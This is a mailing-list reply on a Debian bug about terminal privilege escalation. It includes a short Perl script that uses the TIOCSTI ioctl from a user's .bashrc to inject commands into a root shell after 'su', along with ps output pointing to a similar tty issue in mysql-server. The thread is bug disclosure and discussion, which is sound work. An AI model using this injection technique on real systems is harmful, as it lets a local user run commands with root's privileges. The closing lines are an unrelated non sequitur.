
Re: Bug#357561: privilege escalation hole

Daniel Leidert <daniel.leidert@wgdd.de> writes:

> Didn't know that special treating of terminal exploits.

Nor did I.  Does anyone have a pointer to a discussion of this?  I
assume it must have been discussed a few times already.

As a dumb user, I wasn't aware of the possibilities TIOCSTI gives you.
It was very interesting to see the effect of calling this perl script
from ~luser/.bashrc and then do "su luser" in a root shell:

require "sys/ioctl.ph";
open(TTY, '/dev/tty');
# TIOCSTI queues each character as if it had been typed on the terminal
foreach (split(//,"exit\nid\n")) {
    ioctl(TTY, TIOCSTI(), $_);
}

I think I'll stop using su now ;-)

BTW, I noticed that mysql-server-5.0 also has a problem similar to
apache.  This is the ps output after a recent "apt-get upgrade":

root      8458  0.0  0.0   3912   904 pts/3    S    Feb28   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     8495  0.0  0.3 126524  3780 pts/3    Sl   Feb28   0:00  \_ /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --ski
root      8496  0.0  0.0   2968   356 pts/3    S    Feb28   0:00  \_ logger -p daemon.err -t mysqld_safe -i -t mysqld

Does the special treating of terminal exploits mean that this is not a
bug?  Or should it be reported with a low severity?  As opposed to
apache, normal users rarely have access to run their own code in mysql
context anyway, so exploiting this may be difficult.

Italian people are all satanic DAF drivers, huh?  So, people are dying
every day?
